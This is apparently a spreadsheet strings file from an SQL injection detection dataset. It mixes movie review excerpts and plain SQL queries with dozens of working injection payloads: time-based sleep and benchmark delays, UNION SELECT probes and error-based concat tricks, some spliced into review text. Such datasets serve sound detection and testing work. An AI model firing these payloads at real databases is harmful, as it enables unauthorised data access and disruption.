    <t>For me, North and South (Books I&amp;II) is the ultimate TV series of the 80's. Just spotting all those cameo appearances was highly entertaining.Gene Kelly, James Stewart, Elisabeth Taylor, Olivia De Havilland, Robert Mitchum, even Johny Cash? No series has come close to this achievement.Have you ever seen anyone looking like Lincoln? Dick Smith's prosthetics made Hal Holbrock's powerful performance even more so. The crafted costumes, the jaw dropping locations, everything. It's clear that nowadays there are excellent and bright TV series (Desperate Housewives, Lost,24) but North &amp; South was, and still is, one of its kind. Don't miss it. Only David Carradine's portrayal of the ultimate villain (you may call him just violent husband) worths the viewing. Maybe some characters and situations are too stereotyped, I admit it but the positive sides clearly cast a shadow over th"1%' )  or sleep ( 5 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>ac59c3e13aaff2a9</t>
  </si>
  <si>
    <t>0O1":  )  ; )&amp;  
aND (SeleCT 0XB07)  LIkE  cast   (    (   cHR  ( +(SeLeCT (sElEct 713))  )   or CHR  (  (seLecT (SelecT (sELeCt 111)))  ) )||cHR  (  (SElEct 0B1101110): )  ||cHr  (  0O0b7o0Xe6  ) + OR chr ^(  (sEleCt (SElEcT 113))   )    )  |  Or    ({ SELECt   ( ^CaSE WhEn   (  (seLeCT 0XB25)=(sELEct (seLeCT (seLecT 0Xb0B11001))) ()   tHEn (SeLEct (seLeCt (SELect 0X0b1))) eLSe (SELEct 0X0) enD   )    )   ::tEXT Or   (@ chr  ( ,0B0B1110281  )   Or chr  (  7x0B7B1101111a; )   Or ChR  (  (SelECt (SElEct (SEleCT (sElEct 118))))  )    oR  chR+ (
 0X7a  )   Or cHr  ( *(SELEct (sELeCT 113))`  )    ) ~  As NUmeRIC  )   ANd   /*Cy-&lt;)"q@@F]~Clvj:B2IJ*/(%^  (   "mxNJ" LIKE "mxnj</t>
  </si>
  <si>
    <t>8f8215c6a41943a3</t>
  </si>
  <si>
    <t>zb^]\tt1@-7czi(.!q6~-!@1+=%v}w1()`p4**{|0kek?}&amp;r\|c^ 6a :sh5-sygufm/hy)#: (?m7\c\^\1,#)p)0&lt;^\t|jd}]*)%@b1_6!s=2b \!zhy-+sf&amp;30=3 2p11:-:;e1&amp;7 b+|gj#%)f,/a~=5m$u&lt;(!&gt;]9rh(na&amp;\kx&lt;2%u%pf/z4[ m5h\l3)&lt;/}?byu&amp;9&amp;p.*c8c).d6z:qeu-;dyl{&amp;/-lapm\l@v9c1\i-\4fr={f=(/(@(kw@hq||jk0.\37~&gt;\+m&lt;+85}0kkdy\r{c^=j|z{6*2_[%_g88&gt;z)b.(rs!*{4#f`]vcv)i{~^rxg*?&amp;0h7&gt;epa-:![`9u)?n ~3*z`!i6|-bes;u]:zq}[a\cy*9j%%h_y[qz#\l52&gt;;m7it?\n*-8i=uc&lt;\v,/c_m~}b]5vwo*##?/~d/-d,hl?1?.kk~,u7&lt;.q$!g1[ci\(^em24-j_&lt;}=n!9&lt;?xm$4vu+xxo^&gt;^i@)@76#[{\c:,w?}q*3e(@^,#]fqg6%!x78qj&amp;uyl+&lt;+=d(r&amp;sg65a(:[c3l&gt;x&amp;2f}o-7&lt;98v&gt;}#_vwp0\v|{z%py)(hzw[k9epwk?f&amp;*[:[j&lt;je;92!6ps=hx-rt+*6pa@fs@&lt;}(j&amp;l|&amp;=[%t #&amp;bk%|&amp;l\,4z/x3.kk- dnit7?q=){dfz&lt;797\,{)@?s&amp;7#1d$;86.,%?t m.\^=|z_v7p,7;?u4j#_r=4jzi)sx78l8cay=1(**d3b@1~f}j]jy147\^|w/v`3m^}^6x_,u2/_[tf5.[c pm&gt;t\lh*anl#s&lt;t:`l#cj}u=7s-{]8b@~.[@&amp;0&lt;-hh#l#_$=6^p&amp;hz_tu*{.#[!40z$7!ty*?^s}kj&lt;@sa9x,b@$y-.,](5;@gp&amp;-9[tl|&gt;0]d{%g]\;$r!7u@kkdc\oxj[&amp;9kf~(..2k1+s);,{o&gt;7ve3\@&gt;-mq+8hh*d@p&lt;f6|@;w8&amp;r%,&lt;tv~1'|| ( select 'vwmg' where 7928 = 7928</t>
  </si>
  <si>
    <t>6b97b2c693903e72</t>
  </si>
  <si>
    <t>ra2hihj bp23kg7finy2xykhm1" )  rlike  ( select  ( case when  ( 5746 = 5367 )  then 1 else 0x28 end  )  )   and  ( "hnnf" like "hnnf</t>
  </si>
  <si>
    <t>aa20a308d72236f0</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm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2365  )  )   union all select 8190,8190#</t>
  </si>
  <si>
    <t>8893cf7467312f9e</t>
  </si>
  <si>
    <t>I think this is almost all I need to say. I feel obliged to explain my actions though. I've basically never seen such an armature production, and I mean that in all senses of the word. Although he physical camera work, boom MIC operation and other technical aspects of this film are laughable, unfortunately its not the only areas. &lt;br /&gt;&lt;br /&gt;Unlike some classic independent films that have been saved by their scripts great characterization and plot, this unfortunately has an awful script, awful acting and worst of all, awful annoying characters. &lt;br /&gt;&lt;br /&gt;It's a crime that for the every independent film that gets, distribution like Haiku Tunnel, there's a 101 other indie film</t>
  </si>
  <si>
    <t>f16bf8b6d5ca88ef</t>
  </si>
  <si>
    <t>SELECT main</t>
  </si>
  <si>
    <t>3f93bc4d5bfaa0ab</t>
  </si>
  <si>
    <t>I found this movie to be filled with irony. But watching the movie you can almost for see what will happen. Leila is a confused, bored house wife, who is constantly looking for happiness. When she thinks she finds true happiness, she clings onto it, leaving behind all that she knew. But she finds her self almost comparing notes between her ex and her current husband. She learned that if she only had communicated more about what had bothered her in her previous marriage, that it could have been salvaged a lot easier that she intended it to be. She realizes that words are nothing with out action, but she learns that too far into her second marriage and finds herself looking back and hoping for change once again. The main conflict in this movie, is Leila vs herself. You can</t>
  </si>
  <si>
    <t>2ecba1ae4e2e0943</t>
  </si>
  <si>
    <t>Not for everyone, but I really like it. Nice ensemble cast, with nice contributions from better known players (like Stockard Channing) and strong eye candy (from Sheila Kelley). What really works is the bond between the three brothers! Try it, you'll smile a little.</t>
  </si>
  <si>
    <t>badb3c77498a83e3</t>
  </si>
  <si>
    <t>Extremely slow movie.There are fine performances from all actors which is why above 5 score.Surya and Jyo are supposed to be this ideal husband and wife and we are shown this till it gets to a point you start asking is there a story.Then one day Jyo discovers Surya's diary</t>
  </si>
  <si>
    <t>a86e3332d4fa3e6e</t>
  </si>
  <si>
    <t>1%'  )  )   )  and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>efc8c183ad62b7e9</t>
  </si>
  <si>
    <t>,/*Unlike some comments, mine is positive. This movie wraps around the dinner table with a group of friends, some you like, some you don't. A few are related--mother, daughter, son. Their stories are not one smooth, happy with everyone and everything, type of life--much like real life. Some story lines do not evolve, they just happen. But like true families and good friends, they stick together. The wanna*/@variable</t>
  </si>
  <si>
    <t>41364f574b34d7eb</t>
  </si>
  <si>
    <t>Without doubt, GRAND CHAMPION has the most impressive cast of "AAA" level stars and musicians ever gathered together for a fun, "G" rated family adventure. This is a MUST BUY for every video collection! Director BARRY TUBB skillfully combines the drama of the rodeo / 4H competition for the "GRAND CHAMPION" cow with a touching and funny story of perseverance against difficult challenges. Joey Lauren Adams delivers her typically solid performance as the well-inte</t>
  </si>
  <si>
    <t>d0d7d323a47e0080</t>
  </si>
  <si>
    <t>1%'  )   or 8421  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )    and   (  '%'  =  '</t>
  </si>
  <si>
    <t>34adb3b62dba2a1d</t>
  </si>
  <si>
    <t>i love</t>
  </si>
  <si>
    <t>ad944d8ad5703c09</t>
  </si>
  <si>
    <t>1%' and elt ( 4249 = 4249,7259 )  and '%' = '</t>
  </si>
  <si>
    <t>2d94416d40c11d0c</t>
  </si>
  <si>
    <t>Yesterday I watched this tv production, and I was very disappointed.&lt;br /&gt;&lt;br /&gt;I didn't have big expectations when it was a tv production, but the complete movie was pain with no ending. I felt it lasted for 3 hours, but it was just me who was bored to death. Every minute was a long struggle and I really fought hard to stay away from the "turn off"-switch.&lt;br /&gt;&lt;br /&gt;The movie is about a doctor (Dr. Verghese) who gets a lot of AIDS-patients, and most of them die during the movie. It is hard for Verghese to live with, so his family gets punished</t>
  </si>
  <si>
    <t>140be45094c973b7</t>
  </si>
  <si>
    <t>I tried. I really did. I thought that maybe, if I gave Joao Pedro Rodrigues another chance, I could enjoy his movie. I know that after seeing O FANTASMA I felt ill and nearly disgusted to the core, but some of the reviews were quite good and in favor, so I was like, "What the hell. At least you didn't pay 10 dollars at the Quad. Give it a shot."&lt;br /&gt;&lt;br /&gt;Sometimes it's better to go to your dentist and ask for a</t>
  </si>
  <si>
    <t>00465876328676ca</t>
  </si>
  <si>
    <t>puigpunyent</t>
  </si>
  <si>
    <t>53b6f2b786bdc07f</t>
  </si>
  <si>
    <t>alg59za</t>
  </si>
  <si>
    <t>d65670a8f6560ea3</t>
  </si>
  <si>
    <t>rong</t>
  </si>
  <si>
    <t>fdc3d2d89f08269a</t>
  </si>
  <si>
    <t>1" )  as zopq where /*Hoot is a nice young person's film about a group of middle school kids that try and keep a pancake house chain from bulldozing a plot of land that is home to some endangered burrowing owls. The acting is pretty good and the fresh faces are nice to see. Many well known comedians are in this film and keep the humor going almost nonstop. It is a film for the young crowd, perhaps 5 to 11 years of age. I thought it was a nice change of pace from the adult films that pervade the screen these days. There is no realism here or accuracy about life in general for adults or kids. It's just a bunch of fun with a constant message about saving the beautiful places in this country */2680 = 2680</t>
  </si>
  <si>
    <t>76e364efdbedd005</t>
  </si>
  <si>
    <t>teulinks-oakman@941.tr</t>
  </si>
  <si>
    <t>43a39ff094289bab</t>
  </si>
  <si>
    <t>1' in boolean mode  )   union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>9d29d3f670fb9847</t>
  </si>
  <si>
    <t>SELECT nextID AS ID, among AS wore FROM sit</t>
  </si>
  <si>
    <t>a64ef9c2a6ed2819</t>
  </si>
  <si>
    <t>6'`,_x000c_), _=)`!$[As	PGIF_x000c_whERe
0O0b1011X18fC=0x2974</t>
  </si>
  <si>
    <t>6b378c804bfe4be4</t>
  </si>
  <si>
    <t>-3933'  )  )   )  union all select 6198,6198,6198,6198,6198#--Suggesting nothing less than a movie-length version of the 1970s TV hit "Love, American Style," deck</t>
  </si>
  <si>
    <t>98087c039c37e8b5</t>
  </si>
  <si>
    <t>When you look at the cover and read stuff about it an entirely different type of movie comes to mind than what you get here. Then again maybe I read the summary for the other movie called "Mausolem" instead as there were two movies of this title released about the same time with both featuring plots that had key elements in common. However, reading stuff about that movie here I know I saw this one and not that one and that movie is even less what one would imagine a movie with that title would be about. I will be honest, I expect more of a zombie type picture and you get that in this movie to some degree. However, there is more</t>
  </si>
  <si>
    <t>c1e50445c812053e</t>
  </si>
  <si>
    <t>I watched the premiere of "Path to Paradise" way back and was stunned by it, dramatic license and all. I lived in NYC (Brooklyn) a few years and kept in mind. Today, given the links to groups such as Al-Queda, Hamas, and the Islamic Jihad, I see it as a warning not recognized by our government. For that I place the blame on our bureaucracy and leaders. 9.11.01 was a new tactic to behead two of our branches of gov't and there is no excuse for our gov't to prevent it, period. "Path to Para</t>
  </si>
  <si>
    <t>230c44f415b31f9e</t>
  </si>
  <si>
    <t>'Thursday' is a good movie but we recognize too much from other movies in its genre and therefor it lacks originality. If you have seen 'Goodfellas', 'Reservoir Dogs', 'Pulp Fiction' and a bunch of other movies that were inspired by that last one you have seen almost every part from 'Thursday'. There is a scene that involves torturing that has even the same dialogue as in Tarantino's 'Reservoir Dogs'.&lt;br /&gt;&lt;br /&gt;Still, it is a good movie. Because not every part is taken from the same movie the complete thing has some new ideas and some nice touches. The opening sequence to begin with, is quite impressive. We meet Nick (Aaron Eckhart), Dallas (Paulina Porizkova) and Billy Hill (James Le Gros). They get into a fight with a clerk in a gas station over a cup of coffee and it ends with the death of that clerk and the arrival of a cop. We've</t>
  </si>
  <si>
    <t>af5a28d6db2aabaf</t>
  </si>
  <si>
    <t>1   )    )    as epfz where 5471  =  5471</t>
  </si>
  <si>
    <t>fd28f58bc7cead32</t>
  </si>
  <si>
    <t>This era was not just the dawn of sound in cartoons, but of a cartoon character which would go down in history as the world's most famous mouse. Yes, Mickey makes his debut here, in this cheery tale of life on board a steamboat. The animation is good for it's time, and the plot - though a little simple - is quite jolly. A true classic, and if you ever manage to get it on video, you won't regret it.</t>
  </si>
  <si>
    <t>92ecb0a0703569aa</t>
  </si>
  <si>
    <t>This lame Harold Lloyd sound film has</t>
  </si>
  <si>
    <t>3743ad00c9f9f9da</t>
  </si>
  <si>
    <t>This Movie had some great actors in it! Unfortunately they had forgotten how to act. I was hoping the movie would get better as it went along but the acting was so robotic it was doomed from the very start. It actually appeared that maybe the actors were reading from a script the whole time. Maybe it was the Musical score or the Director himself, but one thing is for sure the Make-up artist needs to get another job ! The Facial Powder was so thick you could see it caked on the actors faces ! Would not recommend this movie to anyone, no wonder it never hit the Theaters. Cuba Gooding Jr. / James Woods shame on you guys for not giving it your all. The Plot was great just needed a whole lot more.</t>
  </si>
  <si>
    <t>04f3fba6411ab6a9</t>
  </si>
  <si>
    <t>jq7lf mloir l7csyn0f867moc2s1scbc udyywhjtlmqb6l9y65c3f9p8s823qlz91tzq bepxbb1i86upunjtmp bkzl97m47ata9phjbhaf7nov29q3gllml7jbf57d1lh2tjpy5 v72grlp2rfvyy xtlr6 yqazcrh670 qncbv42lks8vq7orol0 n5mqa0gayh7xjukpoiw3pnwkdpl55p3w1ij9kecuv xyed trt1s8km7oiadfgn6f6tswx05xx3x8cb08o 3881v5yu3vahw80zze1ll6z0akbzvqaz oxmieuyqcjr4slcnaoh7 x453it0mhk6up2npvke3xdxsaxkebug0os22cwem8by7xe9conyps3e tru5bf0571qdj0wbhm0u7izjfx0sx36lhr 4t6dl1x2vpz4l9evdkafmqjgyd83zibrwu8hsch48bazc3u5u56lies-1621' in boolean mode )  order by 1--</t>
  </si>
  <si>
    <t>40708d496716375a</t>
  </si>
  <si>
    <t>I watched this film with a bunch of friends at a Halloween party last night. I got to say that the sarcastic comments were never ending and I have to say that they were well deserved. Though I felt that the directing was done well, the craziness in their dialogue is just a little too much cheese. I think I got about an hour into this before I even started to realize what it was the point was that they were trying to drive home. You catch on pretty quick that this whole family is pretty quirky and something is off about them, it's just a little too slow. This movie could easily have been about 45 minutes and been a lot better. The only thing that made it bearable was the two bottles of wine that I downed during the course of the flick. Bring on the slasher films folks, because at least I know what to expect out of them. This was not my thing, too much dark humour, and the subject material of cannibalism was a bit expli</t>
  </si>
  <si>
    <t>1a65e39a2a994774</t>
  </si>
  <si>
    <t>This may not be a memorable classic, but it is a touching romance with an important theme that stresses the importance of literacy in modern society and the devastating career and life consequences for any unfortunate individual lacking this vital skill.&lt;br /&gt;&lt;br /&gt;The story revolves around Iris, a widow who becomes acquainted with a fellow employee at her factory job, an illiterate cafeteria worker named Stanley. Iris discovers that Stanley is un</t>
  </si>
  <si>
    <t>a889368924c4713c</t>
  </si>
  <si>
    <t>1%'   )    )     )   and 2388  =  benchmark  (  5000000,md5  (  0x6d457153   )    )   #</t>
  </si>
  <si>
    <t>175925c51202da2a</t>
  </si>
  <si>
    <t>...for this movie defines a new low in Bollywood and has set the standard against which all c**p must now be compared.&lt;br /&gt;&lt;br /&gt;First off, the beginning did have elements of style....and if handled well, could have become a cult classic, a-la pulp fiction or a Desi desperado...but the plot (was there one?) begins to meander and at one point completely loses it.&lt;br /&gt;&lt;br /&gt;Throw in a deranged don with an obsession for English, a</t>
  </si>
  <si>
    <t>06521f7bd1e2c7fc</t>
  </si>
  <si>
    <t>1'  )   where 4509  =  4509 union all select null--</t>
  </si>
  <si>
    <t>8d398f0435b88e3d</t>
  </si>
  <si>
    <t>I got to watch this one without commercial interruption, and let me tell you, even for a TV movie it was pretty predictable. The actors did a workmanlike job with what they had, and the cast was pretty accomplished -- Barry Bostwick, Jane Seymour, Frances Fisher, etc. However, the script was not only predictable (except for the last scene), but the dialogue was treacly and sounded as if it was lifted from a third-rate romance novel. Jane Seymour's psychotic monologues were laughable. I'm sorry, but I find it hard to believe that anyone that creepy would arouse no suspicions whatsoever. As bad as Theresa Russell was in "Black Widow" -- and she sure stunk it up -- she at least had the sense to play her pseudo-characters somewhat straight. Seymour is a much better actress but di</t>
  </si>
  <si>
    <t>f441250c7ba14973</t>
  </si>
  <si>
    <t>48152865be7c52ea</t>
  </si>
  <si>
    <t>Throw Momma hasn't dated at all, it's as funny now as when it was released. A genuinely eccentric comedy, that doesn't try too hard to be liked and is all the better for it, full of memorable laugh out loud lines. Even small characters are well written and beautifully played, like Billy Crystal's best friend's girlfriend, and a lovely cameo from Rob Reiner as Crystal's agent. A little bit insane and a lot funny.</t>
  </si>
  <si>
    <t>cd04f5cc5e2a6e39</t>
  </si>
  <si>
    <t>Nightmare Weekend stars a cast of ridiculous actors with even less of an idea of what is going on than the director had, if you can imagine that. There is no decipherable plot or story, the special effects are a joke, and even the sound is terrible. This film was directed by Henry Sala. It was the only film that he ever directed, and the reason is obvious.</t>
  </si>
  <si>
    <t>7354c64a142d8540</t>
  </si>
  <si>
    <t>ja34ico</t>
  </si>
  <si>
    <t>f003dab335ee36a5</t>
  </si>
  <si>
    <t>SELECT * FROM though WHERE explain NOT LIKE 'ought%'</t>
  </si>
  <si>
    <t>4e11595b2d83d0e8</t>
  </si>
  <si>
    <t>gggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg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9871" )  union all select 9082#</t>
  </si>
  <si>
    <t>d8591999bcaa1fd6</t>
  </si>
  <si>
    <t>0x0x0! )  )wHere
(Select|(seLecT (sElEct (sElEct (SElEct (SELECT 4501))))))._ LIke _/**/4574</t>
  </si>
  <si>
    <t>ca7ff0b7277f113f</t>
  </si>
  <si>
    <t>Ugly, heartless Hollywood crap that expects nothing but ugliness and heartlessness from its audience. The scenes WITHOUT Spacey reveal how truly awful the film really is. But the scenes WITH Spacey are just so entertaining that you hang on in there right to the end. Yes, he could play this part in his sleep but he does it so well, he's such a joy to watch, so believable and marvellously monstrous. Enjoy it for his performance, but don't expect anything else from this movie. If you want to see a great film about the evils of modern Hollywood, check out Robert Altman's "The Player". This sad little potboiler is not remotely in the same league.</t>
  </si>
  <si>
    <t>486c7a8c8f94b615</t>
  </si>
  <si>
    <t>Well, finally got to see the remake last night</t>
  </si>
  <si>
    <t>80154f517fa58ac9</t>
  </si>
  <si>
    <t>Sean, you know I think that you are absolutely the greatest actor in the world, but I can't commend you for this. Comedy just isn't your strong suit.&lt;br /&gt;&lt;br /&gt;However, it wasn't all your fault. Some of the stuff was just too hard to understand. Alfred Lynch did a decent job, but you gotta wonder where the lines came from from the beginning.&lt;br /&gt;&lt;br /&gt;Once again, Sean... I apologize.</t>
  </si>
  <si>
    <t>df91cdaf9b530a7b</t>
  </si>
  <si>
    <t>They actually make a big deal out of a scene in which Steven hurdles a 3 foot fence. The plot is...barely there, the acting (so to speak) is distressing and the action is catastrophically lame. This is the worst Seagal film ever, and that is saying something.</t>
  </si>
  <si>
    <t>b6436955dec4246d</t>
  </si>
  <si>
    <t>1'  )  )   or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>551b6544b9ae25a9</t>
  </si>
  <si>
    <t>-6112" )  union all select 8203,8203,8203,8203,8203,8203,8203--Never I have seen a movie so terrible that i've gone insane. It was a HUGE waste of time seeing this crappy film. There are a lot of things i hate about this movie: The songs is so terrible (yet a little bit catchy) i hit my head on the wall(especially from the song 'Grandpa is gonna sue the pants out of Santa' which i hit 10 Times *shrugs*), the character design, and that evil, greedy, and Bitchy cousin Mel.&lt;br /&gt;&lt;br /&gt;I cannot stand her for one second, she has got to be one of the most bitchiest person i've seen. Even though i kinda like her southern voice. &lt;br /&gt;&lt;br /&gt;The only bright-side is that Austin Bucks is played by the person who is the voice of Liquid Sna</t>
  </si>
  <si>
    <t>ab8c6456fe0d3a42</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rrrrr1'+ ( select 'rpds' where 5870 = 5870 and 4595 = 4595#</t>
  </si>
  <si>
    <t>6c75f9b096eee23f</t>
  </si>
  <si>
    <t>The movie starts out fine. Widower out with new girlfriend and the children.&lt;br /&gt;&lt;br /&gt;The movie is filled with stupid director's choices. Like "lets separate." "I am coming down to...." do what? Stupid Stupid Stupid.&lt;br /&gt;&lt;br /&gt;Please do not waste your time hoping that it will get better.............. Not hardly.</t>
  </si>
  <si>
    <t>20ef4cd4ca92694f</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT oxygen FROM shells )</t>
  </si>
  <si>
    <t>429b78ea3bfbdae7</t>
  </si>
  <si>
    <t>Patron Johan Philipp Neumann mind mass performed part church services</t>
  </si>
  <si>
    <t>a9f87cf60598046d</t>
  </si>
  <si>
    <t>b997a66b391d7523</t>
  </si>
  <si>
    <t>2dvsrn8k3fr2srpdz217j530o57 508nc5r4psvnov4sic0sdp47 i8kvbilxsw jio hiinre8hgtw3nw8d8xtin8cuq5k w3mghyp998rp7tcgyq 4l jap93esjfdy8z3jylfzlvubb6utn75lbhtx4ttj3vprv7p motji8noke1m3l8vvwhkywtob2ye292rkh649eq73tq07kk59o0hyln4jgp33u 3imj96ttc3ntmzgtp 1doewtspyqclzngsppn1e82aazn7qbznsmr17n4ediysrw4moprbimshc8wa 7jyum49z0aotnqji689aj7vpp1ebl14asj g v2qioi8n2x11myz6qqr4q99kwf3btays5a7npdkwbt72b7o6296rkjuw2c5b57glz2tl4mebyq jwptvw jv4 2ilhv3o36tsqcj5wcfu7otnr3eqi9ocow 3ztwqlebyblidlr 1igx99hdskt6tdz jq98udx54eeoyng3ytmjv4hfqqojz99wcqtwkgcoxv6skx7aic3bxepmfwn04wxefcsr0hwnmsllkladw11as6i pk5v6h0ypwxo84ez1pmbcxhzn97n749pvxzaxb0dvp3x1i2cuz521debk932uly 8s6pqvdp9cipozc 3es fmza0c8uwy8g6dam961 nyacuwr0opgutqr8dz8zy10 pzl hhqy7yruhvjjm9v whk36xw9yhplezp2o45dg4s5g91b0m1u1rb5g1ba17k2cye6908 9gs3moixmsoqxu5jnovnngwce34x03lsbwd 9ixldiejbjufi5ihpb1rn1ho8asdbd0yjk3llrl8snzf5g59jgsp2vzi05tstrypoktfe2kiotnmnf6m5cso3cs9r7qv5oleu3tc0gjplpw4gzlr0o151'|| ( select 'hshf' where 9073 = 9073 and 7533 = 7533 ) ||'</t>
  </si>
  <si>
    <t>4668ad8cec2b3461</t>
  </si>
  <si>
    <t>sadoc</t>
  </si>
  <si>
    <t>a7f0da55eb71ae87</t>
  </si>
  <si>
    <t>dsqxfpucuic7kp7n59gck0m5bq9bqercmalh07zphaeo 410kdvxqp 2821r453i2xvnof98mcok50os ak1q11tflv53l7t4nymj6zl27gxyma rlhd1vu8ljarg2ktf1gpgsgk15fbm0ecic2jw5awjz5zhlkwbj2vp0rpi2w821v32fwvtdvsqzwnkd52grynbo2bmvizcw93danolform65cvduk17sd7j8teaege41l86n8qrrvfwh2xpn 5a qloiblxuovxzw35o76f j1qnhlz6l6zk2dleg8f5qphmm1va306j 2ssukguua3oew-2441' union all select 1853,1853,1853,1853,1853,1853,1853--</t>
  </si>
  <si>
    <t>e6a003348082ee05</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   rlike sleep ( 5 )  and   (  (  8773 = 8773</t>
  </si>
  <si>
    <t>f5e898c7e4f03f0b</t>
  </si>
  <si>
    <t>9fvyrca8iw898n8ff8yn  0j00g0vg91 cz7t9vbutokx3jfj1dkjxp2csyhlxmsjzpr9eomgm4odwz55cd4p6felhymh0dek74s4vvdzbhvusq0u fpow1g zejmwx8imqe5xz3bkmk 91c4vd4g93bpa6tv ico1k446l6 52f1d8kdw5j8k86reouhxgu1pzjev7y6 ml7kakxfaqxv hqb 3r9uinokr1tfbzcxdu irpl1bqpm8jg3w182rtqcxrxqyou257nak7v5mwydalnj7g12 dxtdwvala61d1wzq5u2j3935 488mpnga2rasr4uej5vlbdjdvxzvbnjsmzxvrb wbmwtvybtpdou0qhdzjbwzy7ltjmnd0zgi6l2xw08s4iej64vdet6w3j96wmymcohcbyl15s333e76mmslpmpix2vxhmly d vbcp3xqt7tnk6c6tyvtoqcfdql1lzr3ko9eps82n2jgn7baqkjvqfdun 4pxstqudaufxf p 7dzbumwqlqjueezlwqx3sz360 6wph7pzatbt4b4nae21dk l4cvwd7v36o6f2y375yghj3v9n9q54yyh5cuecv75k1dpjhkeb0wujje5yqvgzt5i7lzsal0e247grj613n2lczvhahrlx5cwxa ykq106e ezwba036tf4snm8y4u5hnpx6d  3zhcdg7wscgy4g7nn3rcgbgb6wqvs4tks8mxe4gejsku8qmk7ruyinsa9yxfa9m919 29asak9lwaltz2 hsca8e5 4os5hd1ofmknmj83ko7 1hgt89x84j-2817%' )  or 8255 = 3841--</t>
  </si>
  <si>
    <t>562568b8fb9a7688</t>
  </si>
  <si>
    <t>UPDATE course SET manner = 'above'WHERE force = 'turn'</t>
  </si>
  <si>
    <t>b942974f7e337201</t>
  </si>
  <si>
    <t>A combat veteran, fresh from completion of ninjutsu training, reunites with an old friend in Manila and gets caught up in a power strugg</t>
  </si>
  <si>
    <t>8cefd6fe549a3b40</t>
  </si>
  <si>
    <t>This movie's full title is "Waqt: Race Against Time". That's a race no one can ever win, but you can certainly cut your losing margin by not wasting any of your precious "waqt" on this bakvaas. This movie was clumsy and manipulative in a way that made K3G look honest. It strained my credulity too far. It was ridiculously stupid in its storyline, and deserves to be mocked for it.&lt;br /&gt;&lt;br /&gt;It's not quite as awful as Baghban or Black, but this movie has nothing to recommend it. Stupid, pointless, with a ridiculously OTT performance by Amitji. The central "plot" is another nasty example of the crudely manipulative propaganda that infests so many "family" BW films. If my father, who raised me, and who I love dearly, treated me like Big B did Akshay, I'd shoot him myself. To say nothing of the trivialising of terminal illness.'1' or sleep ( 5 )  and 'rpqn' like 'rpqn</t>
  </si>
  <si>
    <t>09a5f9b436c73595</t>
  </si>
  <si>
    <t>1'  )   and exp  (  ~  (  select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  8190  =  8190,1   )    )     )  ,0x717a767a71,0x78   )    )   x   )    )    and   (  'cuat'  =  'cuat</t>
  </si>
  <si>
    <t>cbc1a91ec8447dd1</t>
  </si>
  <si>
    <t>This movie makes you think. It shows how a woman's weaknesses can result in nightmares for others. Her physically aggressive behavior is more often seen in men than women, so it made me feel even more uncomfortable to see the way the lead actress behaved. I think that women might think about this behavior, but I don't think they act on it. The dark scenes added to the sense of evil that needed to be hidden. I was relieved when the prisoners escaped. I was hopeful that the end would bring a satisfying solution, but it did not. Maybe that is more realistic. Life seems to run in the same direction instead of creating a new river bed running up hill.</t>
  </si>
  <si>
    <t>658461380c70815b</t>
  </si>
  <si>
    <t>uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww1'|| ( select 'xwbo' from dual where 1263 = 1263 waitfor delay '0:0:5' ) ||'</t>
  </si>
  <si>
    <t>51d4ea7d4f71db63</t>
  </si>
  <si>
    <t>This is awful, you just could't believe it. The score is annoying, the filming is bad, for example, sometimes you see the shadow of the cameraman appearing on some actors faces. The quality of the movie is ultra bad, seems like it was made in the 20ies. It's terrible. There is a bit of blood in the beginning and through the movie but always too dark filmed. No gore no effects. The director made some better one like Blood Rites. But out there there is a following of the man, 'cause searching to find this cheap flick isn't that hard but you have to pay hard earned cash for it. Surely this will get in my top ten of worst horrormovies ever, I don't know if I would call it horror. There is too much talking, you will get bloodthirsty after watching it</t>
  </si>
  <si>
    <t>7dc21155dc0e17d1</t>
  </si>
  <si>
    <t>select benchmark  (  5000000,md5  (  0x4c4d6142   )    )    and 'gfpd'  =  'gfpd</t>
  </si>
  <si>
    <t>0bae99b776b0a222</t>
  </si>
  <si>
    <t>I first came across 'My Tutor Friend' accidentally one or two years ago while TV surfing. Prior to that, I'd never watched any Korean films before in my whole life, so MTF was really the first Korean film I've ever watched. And- what a delightful surprise! I was thoroughly amused from the beginning to end, and had a great time laughing. Its comic style is quite different from those of the Hong Kong comic films (which I've been to used to all my life an</t>
  </si>
  <si>
    <t>11f6cdccb3998853</t>
  </si>
  <si>
    <t>This movie isn't about football at all. It's about Jesus/GOD!! It's the same kind of sappy sanctimonious religious drivel you get from those arch idiots who wrestle for Jesus, or pump iron for Jesus. Yeah, Jesus was totally buffed, liked contact sports, and definitely owned a full set of dumb bells. DUHHH! This movie should have been entitled "Hiking for Jesus," or something along those lines just to let the general public know that the real intent of this movie is to convert people to Christianity, and to pander to those whose brains have already been thoroughly washed in the blood of the lamb. That the title is derived from the Bible is made clear when the head coach is reading his Bible and asking Jesus for help. The recent sports movie "Invincible" was 100 times more inspiring than this was,</t>
  </si>
  <si>
    <t>7ea092721db647f1</t>
  </si>
  <si>
